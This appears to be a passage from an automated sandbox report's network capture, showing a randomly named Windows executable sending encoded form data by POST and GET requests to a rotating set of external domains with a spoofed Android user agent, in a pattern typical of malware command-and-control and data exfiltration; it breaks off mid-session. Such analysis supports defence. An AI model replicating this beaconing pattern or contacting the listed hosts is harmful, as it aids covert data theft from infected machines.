                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:33.494874954 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:33 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=823
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCZ9v4TUbt7AbR44Bt%2BkbYCYMDuKjeZjJUhkrraEHezn7XGRcKR34nlimyoDOQejofREhwW%2BfnAkRJwRG0eB74D61rB0rvT9omMliDCl2sFvXmNAbbHPhGKp1WH3HxuiZbeQMe3yrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a90a77df442ca-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Ascii: 7f3<!doctype html><html><head> <title>404 </title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'> <style> body, html { height: 100%; margin: 0; display: flex; justify-content: center; align-items: center; background-color: #f1f4f5; color: #37474f; font-family: 'Open Sans', sans-serif; } .co
                                                              Sep 11, 2024 22:56:33.494895935 CEST | 1236 | IN |
                                                              Data Ascii: ntainer { display: flex; width: 535px; } .container-code{ min-width: 250px; text-align: center; } .container-text { min-width: 250px; paddi
                                                              Sep 11, 2024 22:56:33.494906902 CEST | 200 | IN |
                                                              Data Ascii: </span> </div> <div class="container-text"> <span class="error_brief"> </span> </div></div></body></html>0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              29 | 192.168.2.7 | 59690 | 162.240.81.18 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:38.992166042 CEST | 702 | OUT | POST /a5gd/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.jeandreo.store
                                                              Origin: http://www.jeandreo.store
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.jeandreo.store/a5gd/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=Cs1PoxsiX+eomnCceELmtKTNGtaWdO+HWABo6OjryAqlljt8vAH8guZAB4c5Pa1DEiP7lJPT/TBZY/oE3urGP7+B7h2JtOiGeqfw4v6WC0bveSB7AOTihSkLHuILyV4bpirh52l5JAiyDHb6z5MXwqJsV46CIxmqH9N2hHsAy6fPyNu1F586I9R2NFq3xVivPOxwt279dngIz71y0w==
                                                              Sep 11, 2024 22:56:39.549704075 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx/1.20.1
                                                              Date: Wed, 11 Sep 2024 20:56:39 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3650
                                                              Connection: close
                                                              ETag: "663a05b6-e42"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              30 | 192.168.2.7 | 59691 | 162.240.81.18 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:41.545917988 CEST | 722 | OUT | POST /a5gd/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.jeandreo.store
                                                              Origin: http://www.jeandreo.store
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.jeandreo.store/a5gd/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=Cs1PoxsiX+eokHycSD3m8aTODtaWUu/OWB9o6Pn7yyellBl8uBH8nuZAKYdzSK1EEiCGlM3T/XpZY+YE0frHPr+fyB2LiuiGeqfw4vHzC0zveDx7Dr/hiSkKXOIL2V5zpir550BDJCqyDGL6woMWpaJufY78bzOnecZli0o2zNP36bzXfbwWWspNJHOBmz/aNP1ogUPcCQFi+pU2iA/86TntOL+h7UQhuX8AvOQ=
                                                              Sep 11, 2024 22:56:42.410636902 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx/1.20.1
                                                              Date: Wed, 11 Sep 2024 20:56:42 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3650
                                                              Connection: close
                                                              ETag: "663a05b6-e42"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              31 | 192.168.2.7 | 59692 | 162.240.81.18 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:44.085916996 CEST | 1735 | OUT | POST /a5gd/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.jeandreo.store
                                                              Origin: http://www.jeandreo.store
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.jeandreo.store/a5gd/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:44.656251907 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx/1.20.1
                                                              Date: Wed, 11 Sep 2024 20:56:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3650
                                                              Connection: close
                                                              ETag: "663a05b6-e42"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              32 | 192.168.2.7 | 59693 | 162.240.81.18 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:46.628933907 CEST | 442 | OUT | GET /a5gd/?XvhP6L=PudvrHhxWdfxtGGhQSPM4Nv1Dcz9A9OmcQNSz/CJh1KNnxIb2QXQvP51CacMS4xZciC0s5SL/yVXPvg6yOeNO+2G0wSJvvCXF5bk0r60CWn1bzRkQZzJoS1GIdNZy2RK3STysnFtIBWS&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.jeandreo.store
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:47.204437971 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx/1.20.1
                                                              Date: Wed, 11 Sep 2024 20:56:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3650
                                                              Connection: close
                                                              ETag: "663a05b6-e42"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              33 | 192.168.2.7 | 59694 | 162.0.213.94 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:52.269952059 CEST | 687 | OUT | POST /knrh/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zimra.xyz
                                                              Origin: http://www.zimra.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.zimra.xyz/knrh/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=ViIAbZaXHuo+xyhzR0CBJUlz/N29cPvs1pJI1OkmZx6XypZSi/ifTtszt02PlesYd2KOEt8jMBGvp8NsDZD00P6rfyOGppEkJ1Jd5Tr+ESUszndb7r0hQi4jRe2nZatXPMEJkjD44VT162MgUtSIIlDGW1Mi3cBlTcVBcMazN96C6hloREqbRbC1tFt9OEMcOckTExF75FWrzRc3Ag==
                                                              Sep 11, 2024 22:56:52.870445013 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:52 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Sep 11, 2024 22:56:52.871037960 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                              Sep 11, 2024 22:56:52.875444889 CEST1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                              Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              34 | 192.168.2.7 | 59695 | 162.0.213.94 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:54.803069115 CEST | 707 | OUT | POST /knrh/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zimra.xyz
                                                              Origin: http://www.zimra.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.zimra.xyz/knrh/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:55.423834085 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:55 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              35 | 192.168.2.7 | 59696 | 162.0.213.94 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:57.359627962 CEST | 1720 | OUT | POST /knrh/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zimra.xyz
                                                              Origin: http://www.zimra.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.zimra.xyz/knrh/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:57.952769995 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:57 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              36 | 192.168.2.7 | 59697 | 162.0.213.94 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:59.893023968 CEST | 437 | OUT | GET /knrh/?XvhP6L=YgggYvzCIY9cxyt1YCa2G3R12OneF5/58fBG84NSPGW4/awNicu/ZN4HtGSklex6REK8bsR/OR3Y+MJqd7/88rmQQgGzhJF4KytM6w66NwsLhFIcz78jdTwuasaid4VzQcobuCXl81HP&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.zimra.xyz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:57:00.498545885 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:57:00 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Ascii: -width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43
                                                              Sep 11, 2024 22:57:00.498910904 CEST108INData Raw: 34 36 37 32 20 2d 31 31 2e 39 31 32 38 30 38 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30
                                                              Data Ascii: 4672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,
                                                              Sep 11, 2024 22:57:00.498920918 CEST1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                              Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                              Sep 11, 2024 22:57:00.498934031 CEST1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                              Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                              Sep 11, 2024 22:57:00.506315947 CEST1236INData Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74
                                                              Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              37 | 192.168.2.7 | 59698 | 84.32.84.32 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:05.704714060 CEST | 702 | OUT | POST /7fgk/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.legitima.legal
                                                              Origin: http://www.legitima.legal
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.legitima.legal/7fgk/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              38 | 192.168.2.7 | 59699 | 84.32.84.32 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:08.384095907 CEST | 722 | OUT | POST /7fgk/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.legitima.legal
                                                              Origin: http://www.legitima.legal
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.legitima.legal/7fgk/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              39 | 192.168.2.7 | 59700 | 84.32.84.32 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:10.929728985 CEST | 1735 | OUT | POST /7fgk/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.legitima.legal
                                                              Origin: http://www.legitima.legal
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.legitima.legal/7fgk/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              40 | 192.168.2.7 | 59701 | 84.32.84.32 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:13.475203991 CEST | 442 | OUT | GET /7fgk/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=jsI13KUmBZ1T5rh+bHmke0O+W3Z/A6nMw4DpVk3nSlnNNLSGuDQ/FPhySwGHE5L/lacb6zZ1lT+tB+A3kLGRxOtsHOzzZCR5pN3lBpoImaPzbOWkADZ6ueCTs7gp0g7tISQqu/NYQOSA HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.legitima.legal
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:57:13.948204994 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              Server: hcdn
                                                              Date: Wed, 11 Sep 2024 20:57:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 10072
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: b41aa8e963314f27d29eb3f2e9d5f75e-bos-edge2
                                                              Expires: Wed, 11 Sep 2024 20:57:12 GMT
                                                              Cache-Control: no-cache
                                                              Accept-Ranges: bytes


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              41 | 192.168.2.7 | 59702 | 35.214.33.204 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:19.167165995 CEST | 711 | OUT | POST /i118/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.autochemtools.com
                                                              Origin: http://www.autochemtools.com
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.autochemtools.com/i118/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              42 | 192.168.2.7 | 59703 | 35.214.33.204 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:21.716075897 CEST | 731 | OUT | POST /i118/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.autochemtools.com
                                                              Origin: http://www.autochemtools.com
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.autochemtools.com/i118/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              43 | 192.168.2.7 | 59704 | 35.214.33.204 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:24.261996031 CEST | 1744 | OUT | POST /i118/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.autochemtools.com
                                                              Origin: http://www.autochemtools.com
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.autochemtools.com/i118/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              44 | 192.168.2.7 | 59705 | 35.214.33.204 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:26.800091028 CEST | 445 | OUT | GET /i118/?XvhP6L=l78tjT99nfWmEsVDs1FvFZ9WuYye9a70xFpF/w9BItZXEYkJuJfqp9pdvrQptbQ2LO1yeOIECnfIu7s7S7+7Q3i1eKl3stoZZ1arBng6e4IDYKgW1i7918V1fhSLuSwuhzNanlWnB/aN&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.autochemtools.com
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              45 | 192.168.2.7 | 59706 | 3.33.130.190 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:32.564100027 CEST | 717 | OUT | POST /ufia/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.thewhitediamond.org
                                                              Origin: http://www.thewhitediamond.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.thewhitediamond.org/ufia/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=+PiU2N3cRTG3RHSd9dg2yWLyYk84jzZStsq1XTI8NoESDy/gYANZYPRjLkjdYYnA6j6rtW8ddeKdL6ztQu1VtrYI73hIxXroxUvpUj5G06WiU2XSTVpeaP+LhFt4vy881Jd5023Yf80X1tH9QKangc9EDkbeEEqxR9Ozj8iAQIMGNhzLvjaAF3VfL6/qwn0NczyStOw6iqfCc29hYg==


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              46 | 192.168.2.7 | 59707 | 3.33.130.190 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:35.100337982 CEST | 737 | OUT | POST /ufia/ HTTP/1.1
